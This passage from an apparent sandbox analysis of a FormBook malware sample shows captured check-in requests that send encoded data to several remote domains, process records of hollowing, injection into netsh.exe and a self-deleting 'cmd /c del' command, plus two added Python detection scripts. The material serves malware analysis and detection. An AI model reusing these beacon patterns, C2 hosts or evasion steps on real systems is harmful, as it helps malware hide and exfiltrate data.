                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                        Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                                                        Session ID:8
                                                                        Source IP:192.168.2.3
                                                                        Source Port:49750
                                                                        Destination IP:198.185.159.144
                                                                        Destination Port:80
                                                                        Process:C:\Windows\explorer.exe
                                                                        Timestamp:Feb 23, 2021 09:01:27.236773014 CET
                                                                        kBytes transferred:6141
                                                                        Direction:OUT
                                                                        Data:GET /bw82/?2dspCJ=cQgJWKf8RQ1tgXmhpNlNvU1Wcwt7yBWYkRci+XoIvJPaxwQIB73a/eHibjyZxTY12AhF&L6Ah=2dPLKjuxNzghip HTTP/1.1
                                                                        Host: www.usmedicarenow.com
                                                                        Connection: close
                                                                        Data Raw: 00 00 00 00 00 00 00
                                                                        Data Ascii:
                                                                        Timestamp:Feb 23, 2021 09:01:27.410075903 CET
                                                                        kBytes transferred:6142
                                                                        Direction:IN
                                                                        Data:HTTP/1.1 400 Bad Request
                                                                        Cache-Control: no-cache, must-revalidate
                                                                        Content-Length: 77564
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Date: Tue, 23 Feb 2021 08:01:27 UTC
                                                                        Expires: Thu, 01 Jan 1970 00:00:00 UTC
                                                                        Pragma: no-cache
                                                                        Server: Squarespace
                                                                        X-Contextid: lqHZDjYv/YoSYJ3JA
                                                                        Connection: close
                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 77 68 69 74 65 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 7b 0a 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 20 20 20 20 74 6f 70 3a 20 35 30 25 3b 0a 20 20 20 20 6c 65 66 74 3a 20 35 30 25 3b 0a 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 3a 20 74 72 61 6e 73 6c 61 74 65 28 2d 35 30 25 2c 20 2d 35 30 25 29 3b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 6d 69 6e 2d 77 69 64 74 68 3a 20 39 35 76 77 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 68 31 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 33 30 30 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 34 2e 36 65 6d 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 31 39 31 39 31 39 3b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 20 30 20 31 31 70 78 20 30 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 70 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 2e 34 65 6d 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 61 33 61 33 61 3b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 33 30 30 3b 0a 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 32 65 6d 3b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 70 20 61 20 7b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 61 33 61 33 61 3b 0a 20 20 20 20 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 6e 6f 6e 65 3b 0a 20 20 20 20 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 
3a 20 73 6f 6c 69 64 20 31 70 78 20 23 33 61 33 61 33 61 3b 0a 20 20 7d 0a 0a 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 22 43 6c 61 72 6b 73 6f 6e 22 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 32 70 78 3b 0a 20 20 7d 0a 0a 20 20 23 73 74 61 74 75 73 2d 70 61 67 65 20 7b 0a 20 20 20 20 64 69 73 70 6c 61 79 3a 20 6e 6f 6e 65 3b 0a 20 20 7d 0a 0a 20 20 66 6f 6f 74 65 72 20 7b 0a 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 20 20 20 20 62 6f 74 74 6f 6d 3a 20 32 32 70 78 3b 0a 20 20 20 20 6c 65 66 74 3a 20 30 3b 0a 20 20 20 20 77 69 64 74 68 3a 20 31 30 30 25 3b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 32 65 6d 3b 0a 20 20 7d 0a 0a 20 20 66 6f 6f 74 65 72 20 73 70 61 6e 20 7b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 20 31 31 70 78 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 65 6d 3b 0a 20 20 20 20
                                                                        Data Ascii: <!DOCTYPE html><head> <title>400 Bad Request</title> <meta name="viewport" content="width=device-width, initial-scale=1"> <style type="text/css"> body { background: white; } main { position: absolute; top: 50%; left: 50%; transform: translate(-50%, -50%); text-align: center; min-width: 95vw; } main h1 { font-weight: 300; font-size: 4.6em; color: #191919; margin: 0 0 11px 0; } main p { font-size: 1.4em; color: #3a3a3a; font-weight: 300; line-height: 2em; margin: 0; } main p a { color: #3a3a3a; text-decoration: none; border-bottom: solid 1px #3a3a3a; } body { font-family: "Clarkson", sans-serif; font-size: 12px; } #status-page { display: none; } footer { position: absolute; bottom: 22px; left: 0; width: 100%; text-align: center; line-height: 2em; } footer span { margin: 0 11px; font-size: 1em;


                                                                        Session ID:9
                                                                        Source IP:192.168.2.3
                                                                        Source Port:49751
                                                                        Destination IP:34.102.136.180
                                                                        Destination Port:80
                                                                        Process:C:\Windows\explorer.exe
                                                                        Timestamp:Feb 23, 2021 09:01:32.535267115 CET
                                                                        kBytes transferred:6164
                                                                        Direction:OUT
                                                                        Data:GET /bw82/?L6Ah=2dPLKjuxNzghip&2dspCJ=kkzs7wdk+a5EmvlejfiLHnYXY/z1ZZpbk/A0waQQyoH3vrpc5BJXUH7YClYSBXJaDwsI HTTP/1.1
                                                                        Host: www.activagebenefits.net
                                                                        Connection: close
                                                                        Data Raw: 00 00 00 00 00 00 00
                                                                        Data Ascii:
                                                                        Timestamp:Feb 23, 2021 09:01:32.674674034 CET
                                                                        kBytes transferred:6164
                                                                        Direction:IN
                                                                        Data:HTTP/1.1 403 Forbidden
                                                                        Server: openresty
                                                                        Date: Tue, 23 Feb 2021 08:01:32 GMT
                                                                        Content-Type: text/html
                                                                        Content-Length: 275
                                                                        ETag: "603155b8-113"
                                                                        Via: 1.1 google
                                                                        Connection: close
                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                        Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>
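
The nine sessions above share one check-in shape: the injected explorer.exe issues a GET to /bw82/ with two query parameters, one of which (L6Ah=2dPLKjuxNzghip) is identical in every request while the other carries a long base64-like value, the Host header rotates through nine unrelated domains, and every request is sent with Connection: close. Most of those hosts answer with a generic 403/404/400 page; only www.thebabyfriendly.com returns 200 OK. The script below is an added example and not part of the Joe Sandbox report: it parses request lines of this form and groups them by path and constant parameter, so the same pattern can be pulled out of proxy or IDS logs. The path and parameter-length heuristic is an assumption derived from these nine requests, not a vendor signature; the nine request lines are copied from the sessions above and the two benign lines at the end of the input are constructed.

```python
import re
from collections import defaultdict

# (request line, Host header) for the nine HTTP sessions in the report above,
# copied from the report. The last two entries are constructed benign requests
# (not from the report) that the heuristic should ignore.
SESSIONS = [
    ("GET /bw82/?L6Ah=2dPLKjuxNzghip&2dspCJ=G5V/jI1lXUWhm2/po/i12Eg93VLS1Yw8/s5fANqQYS1eyL2v/ZzyMw3Ygf/31m6ddEJO HTTP/1.1", "www.ramjamdee.com"),
    ("GET /bw82/?2dspCJ=AJ+QNFfpTCGoeNdN3oQHABBFVni950JEMBWacmvnp29IOaric6KDWsJikAvcMmAxBpMV&L6Ah=2dPLKjuxNzghip HTTP/1.1", "www.rizrvd.com"),
    ("GET /bw82/?L6Ah=2dPLKjuxNzghip&2dspCJ=7KG5rMnJQVi61jAewyvwq06b8xrmRTVdiDIOhf904IMqwa5VOrK6tjTZXar9S1Zs43DY HTTP/1.1", "www.gdsjgf.com"),
    ("GET /bw82/?2dspCJ=ErYhPq0/zQvehGK9wS6+i9BP1HsxrMLlWLaBPkVFk6gJ3Rf5IPX3ZCPP9+b6hANSOkIk&L6Ah=2dPLKjuxNzghip HTTP/1.1", "www.climaxnovels.com"),
    ("GET /bw82/?L6Ah=2dPLKjuxNzghip&2dspCJ=r3fdhBxfm/17hO+WGttpxejAYTJXJLNaeaIMUW/kEa9Q3oKyIBTjSr0cbQanu0dSY6cl HTTP/1.1", "www.thebabyfriendly.com"),
    ("GET /bw82/?L6Ah=2dPLKjuxNzghip&2dspCJ=455EGVYP5nwn6UKaNruX/4AMFbR5eugGoFi+RSiFi9xq+Sc4S/7LJuL4z/DBianrCvuj HTTP/1.1", "www.wellnesssensation.com"),
    ("GET /bw82/?2dspCJ=qtQC6ueLh9SPHvPoeB2W7XMv4DHg8NEty8uJPphl3NdNxxbo+oCUuV5k45UTpNkEWHc7&L6Ah=2dPLKjuxNzghip HTTP/1.1", "www.gallerybrows.com"),
    ("GET /bw82/?2dspCJ=cQgJWKf8RQ1tgXmhpNlNvU1Wcwt7yBWYkRci+XoIvJPaxwQIB73a/eHibjyZxTY12AhF&L6Ah=2dPLKjuxNzghip HTTP/1.1", "www.usmedicarenow.com"),
    ("GET /bw82/?L6Ah=2dPLKjuxNzghip&2dspCJ=kkzs7wdk+a5EmvlejfiLHnYXY/z1ZZpbk/A0waQQyoH3vrpc5BJXUH7YClYSBXJaDwsI HTTP/1.1", "www.activagebenefits.net"),
    # constructed benign traffic, not from the report
    ("GET /index.html HTTP/1.1", "www.example.com"),
    ("GET /search?q=firmware+update&page=2 HTTP/1.1", "www.example.org"),
]

REQUEST_LINE = re.compile(r"^(?P<method>[A-Z]+) (?P<target>\S+) HTTP/1\.[01]$")
SHORT_DIR = re.compile(r"^/[a-z0-9]{2,8}/$")      # single short directory, e.g. /bw82/
B64ISH = re.compile(r"^[A-Za-z0-9+/]+={0,2}$")     # alphabet of the long encoded value


def parse_request(line):
    """Return (method, path, [(name, value), ...]) for an HTTP/1.x request line,
    or None if the line is not one.

    The query string is split by hand rather than with urllib.parse.parse_qsl,
    because parse_qsl rewrites '+' as a space and the encoded values in the
    report contain literal '+' characters that must survive intact.
    """
    m = REQUEST_LINE.match(line.strip())
    if not m:
        return None
    path, _, query = m.group("target").partition("?")
    params = []
    if query:
        for part in query.split("&"):
            name, _, value = part.partition("=")
            params.append((name, value))
    return m.group("method"), path, params


def looks_like_formbook_beacon(method, path, params):
    """Heuristic (an assumption drawn from the nine sessions above): a GET to a
    short single-directory path with exactly two query parameters, one short
    alphanumeric value that stays constant across hosts and one long
    base64-like value carrying the encoded payload."""
    if method != "GET" or not SHORT_DIR.match(path) or len(params) != 2:
        return False
    short, long_ = sorted((v for _, v in params), key=len)
    return (short.isalnum() and len(short) <= 20
            and len(long_) >= 40 and B64ISH.match(long_) is not None)


def cluster_beacons(sessions):
    """Group matching requests by path plus the constant (short) parameter,
    which is what ties the rotating Host values together. Returns a dict
    {"<path>?<name>=<value>": [host, ...]}."""
    clusters = defaultdict(list)
    for line, host in sessions:
        parsed = parse_request(line)
        if not parsed or not looks_like_formbook_beacon(*parsed):
            continue
        _, path, params = parsed
        name, value = min(params, key=lambda nv: len(nv[1]))
        clusters[f"{path}?{name}={value}"].append(host)
    return dict(clusters)


if __name__ == "__main__":
    for key, hosts in cluster_beacons(SESSIONS).items():
        print(f"{key}: {len(hosts)} hosts")
        for host in hosts:
            print("   ", host)
```

Run against the sessions from this report, the script yields a single cluster, /bw82/?L6Ah=2dPLKjuxNzghip, containing all nine hosts and neither constructed benign request. In a real deployment the interesting signal is not any single domain (most of them answered with an error page) but the one constant parameter and path shared across many hosts from one client process; the hosts in a cluster are then candidates for the real C2 among decoys, with the 200 OK responder worth checking first.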


                                                                        Code Manipulations

                                                                        Statistics

                                                                        Behavior


                                                                        System Behavior

                                                                        General

                                                                        Start time:08:59:23
                                                                        Start date:23/02/2021
                                                                        Path:C:\Users\user\Desktop\vBugmobiJh.exe
                                                                        Wow64 process (32bit):true
                                                                        Commandline:'C:\Users\user\Desktop\vBugmobiJh.exe'
                                                                        Imagebase:0x2d0000
                                                                        File size:484864 bytes
                                                                        MD5 hash:5B59E521935E56A03255623DF51C1631
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:.Net C# or VB.NET
                                                                        Yara matches:
                                                                        • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000001.00000002.229831410.00000000026F1000.00000004.00000001.sdmp, Author: Joe Security
                                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.230287817.00000000036F9000.00000004.00000001.sdmp, Author: Joe Security
                                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.230287817.00000000036F9000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.230287817.00000000036F9000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                        Reputation:low

                                                                        General

                                                                        Start time:08:59:33
                                                                        Start date:23/02/2021
                                                                        Path:C:\Users\user\Desktop\vBugmobiJh.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Users\user\Desktop\vBugmobiJh.exe
                                                                        Imagebase:0x150000
                                                                        File size:484864 bytes
                                                                        MD5 hash:5B59E521935E56A03255623DF51C1631
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:low

                                                                        General

                                                                        Start time:08:59:33
                                                                        Start date:23/02/2021
                                                                        Path:C:\Users\user\Desktop\vBugmobiJh.exe
                                                                        Wow64 process (32bit):true
                                                                        Commandline:C:\Users\user\Desktop\vBugmobiJh.exe
                                                                        Imagebase:0x430000
                                                                        File size:484864 bytes
                                                                        MD5 hash:5B59E521935E56A03255623DF51C1631
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Yara matches:
                                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000002.267925714.0000000000980000.00000040.00000001.sdmp, Author: Joe Security
                                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000002.267925714.0000000000980000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000002.267925714.0000000000980000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000002.267841764.00000000005D0000.00000040.00000001.sdmp, Author: Joe Security
                                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000002.267841764.00000000005D0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000002.267841764.00000000005D0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000002.267667639.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000002.267667639.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000002.267667639.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                        Reputation:low

                                                                        General

                                                                        Start time:08:59:35
                                                                        Start date:23/02/2021
                                                                        Path:C:\Windows\explorer.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:
                                                                        Imagebase:0x7ff714890000
                                                                        File size:3933184 bytes
                                                                        MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:high

                                                                        General

                                                                        Start time:08:59:49
                                                                        Start date:23/02/2021
                                                                        Path:C:\Windows\SysWOW64\netsh.exe
                                                                        Wow64 process (32bit):true
                                                                        Commandline:C:\Windows\SysWOW64\netsh.exe
                                                                        Imagebase:0xf90000
                                                                        File size:82944 bytes
                                                                        MD5 hash:A0AA3322BB46BBFC36AB9DC1DBBBB807
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Yara matches:
                                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000A.00000002.473763898.0000000002FD0000.00000040.00000001.sdmp, Author: Joe Security
                                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000A.00000002.473763898.0000000002FD0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000A.00000002.473763898.0000000002FD0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000A.00000002.472446069.0000000000F40000.00000040.00000001.sdmp, Author: Joe Security
                                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000A.00000002.472446069.0000000000F40000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000A.00000002.472446069.0000000000F40000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000A.00000002.475304202.0000000003350000.00000004.00000001.sdmp, Author: Joe Security
                                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000A.00000002.475304202.0000000003350000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000A.00000002.475304202.0000000003350000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                        Reputation:high

                                                                        General

                                                                        Start time:08:59:53
                                                                        Start date:23/02/2021
                                                                        Path:C:\Windows\SysWOW64\cmd.exe
                                                                        Wow64 process (32bit):true
                                                                        Commandline:/c del 'C:\Users\user\Desktop\vBugmobiJh.exe'
                                                                        Imagebase:0x12f0000
                                                                        File size:232960 bytes
                                                                        MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:high

                                                                        General

                                                                        Start time:08:59:54
                                                                        Start date:23/02/2021
                                                                        Path:C:\Windows\System32\conhost.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                        Imagebase:0x7ff6b2800000
                                                                        File size:625664 bytes
                                                                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:high
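
The process records above are what a detection engineer would turn into rules. The Python below is an added example, not part of the Joe Sandbox report or of any vendor tooling. It rebuilds the System Behavior records as constructed input and applies four checks that this FormBook chain triggers: the sample relaunching a copy of itself (the hollowing step), a system utility (netsh.exe) started with no arguments, cmd.exe deleting the original file, and Yara hits in memory regions whose dump name records PAGE_EXECUTE_READWRITE protection. The reading of the dotted .sdmp name (process index, dump base address, protection flags) is an assumption inferred from the values on this page, and the set of argument-expecting utilities is illustrative rather than FormBook's actual target list.

```python
import re
from dataclasses import dataclass, field
from datetime import datetime

# Page-protection values from winnt.h. The fifth dotted field of a Joe Sandbox
# .sdmp dump name is ASSUMED to carry this value (0x40 and 0x04 are the two
# values that appear in the report above).
PAGE_READWRITE = 0x04
PAGE_EXECUTE_READWRITE = 0x40
PAGE_EXECUTE_WRITECOPY = 0x80

SAMPLE_PATH = r"C:\Users\user\Desktop\vBugmobiJh.exe"

@dataclass
class Proc:
    start: datetime
    path: str
    cmdline: str
    md5: str
    yara_sources: list = field(default_factory=list)

def _t(h, m, s):
    return datetime(2021, 2, 23, h, m, s)

# Constructed from the System Behavior records above (one or two Yara sources per
# process are enough to exercise the rules); this is test data, not report output.
PROCS = [
    Proc(_t(8, 59, 23), SAMPLE_PATH, "'" + SAMPLE_PATH + "'", "5B59E521935E56A03255623DF51C1631",
         ["00000001.00000002.230287817.00000000036F9000.00000004.00000001.sdmp"]),
    Proc(_t(8, 59, 33), SAMPLE_PATH, SAMPLE_PATH, "5B59E521935E56A03255623DF51C1631"),
    Proc(_t(8, 59, 33), SAMPLE_PATH, SAMPLE_PATH, "5B59E521935E56A03255623DF51C1631",
         ["00000006.00000002.267667639.0000000000400000.00000040.00000001.sdmp"]),
    Proc(_t(8, 59, 35), r"C:\Windows\explorer.exe", "", "AD5296B280E8F522A8A897C96BAB0E1D"),
    Proc(_t(8, 59, 49), r"C:\Windows\SysWOW64\netsh.exe", r"C:\Windows\SysWOW64\netsh.exe",
         "A0AA3322BB46BBFC36AB9DC1DBBBB807",
         ["0000000A.00000002.473763898.0000000002FD0000.00000040.00000001.sdmp",
          "0000000A.00000002.475304202.0000000003350000.00000004.00000001.sdmp"]),
    Proc(_t(8, 59, 53), r"C:\Windows\SysWOW64\cmd.exe", "/c del '" + SAMPLE_PATH + "'",
         "F3BDBE3BB6F734E357235F4D5898582D"),
    Proc(_t(8, 59, 54), r"C:\Windows\System32\conhost.exe",
         r"C:\Windows\system32\conhost.exe 0xffffffff -ForceV1", "EA777DEEA782E8B4D7C7C33BBF8A4496"),
]

# Dump-name layout assumed from the samples above: proc.stage.id.base.protect.type.sdmp
SDMP_RE = re.compile(
    r"^([0-9a-f]{8})\.([0-9a-f]{8})\.(\d+)\.([0-9a-f]{16})\.([0-9a-f]{8})\.([0-9a-f]{8})\.sdmp$", re.I)

def parse_sdmp(name):
    """Return process index, region base and protection flags from a dump name."""
    m = SDMP_RE.match(name)
    if not m:
        raise ValueError("unexpected dump name: " + name)
    return {"proc": int(m.group(1), 16), "base": int(m.group(4), 16),
            "protect": int(m.group(5), 16)}

def _exe(p):
    return p.path.rsplit("\\", 1)[-1].lower()

def find_self_relaunch(procs, window_s=30):
    """Same image and hash started again within window_s of the first instance:
    the trace a loader leaves when it hollows a fresh copy of itself."""
    first, hits = {}, []
    for p in sorted(procs, key=lambda x: x.start):
        key = (p.path.lower(), p.md5.lower())
        if key in first and (p.start - first[key]).total_seconds() <= window_s:
            hits.append(p)
        first.setdefault(key, p.start)
    return hits

# Illustrative set of utilities that carry arguments in legitimate use; an instance
# whose command line is nothing but its own image path is a likely injection host.
ARG_EXPECTED = {"netsh.exe", "cmd.exe", "wscript.exe", "cscript.exe"}

def find_lolbin_without_args(procs):
    return [p for p in procs if _exe(p) in ARG_EXPECTED
            and p.cmdline.strip().strip("'\"").lower() in ("", p.path.lower())]

def find_self_delete(procs, sample_path):
    """cmd.exe /c del <sample>: the dropper removing its own file after injection."""
    pat = re.compile(r"/c\s+del\b", re.I)
    return [p for p in procs if _exe(p) == "cmd.exe"
            and pat.search(p.cmdline) and sample_path.lower() in p.cmdline.lower()]

def find_rwx_yara_regions(procs):
    """Yara matches inside writable+executable regions point at unpacked or
    injected code rather than a normally mapped image section."""
    out = []
    for p in procs:
        for src in p.yara_sources:
            d = parse_sdmp(src)
            if d["protect"] in (PAGE_EXECUTE_READWRITE, PAGE_EXECUTE_WRITECOPY):
                out.append((p.path, d["base"]))
    return out

def analyze(procs, sample_path):
    return {
        "self_relaunch": [p.start.strftime("%H:%M:%S") for p in find_self_relaunch(procs)],
        "lolbin_no_args": [p.path for p in find_lolbin_without_args(procs)],
        "self_delete": [p.cmdline for p in find_self_delete(procs, sample_path)],
        "rwx_yara": [(path, hex(base)) for path, base in find_rwx_yara_regions(procs)],
    }

if __name__ == "__main__":
    for rule, hits in analyze(PROCS, SAMPLE_PATH).items():
        print(rule, hits)
```

On the records above the rules fire on the two relaunches at 08:59:33, on netsh.exe, on the cmd.exe deletion, and on the two Yara hits at 0x400000 (in the hollowed copy) and 0x2FD0000 (in netsh.exe); the PAGE_READWRITE hits at 0x36F9000 and 0x3350000 are left out because unpacked data in a plain RW heap is a weaker signal than code in an RWX region. The same functions run unchanged over a larger process list exported from any sandbox, provided the field layout is mapped into Proc.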
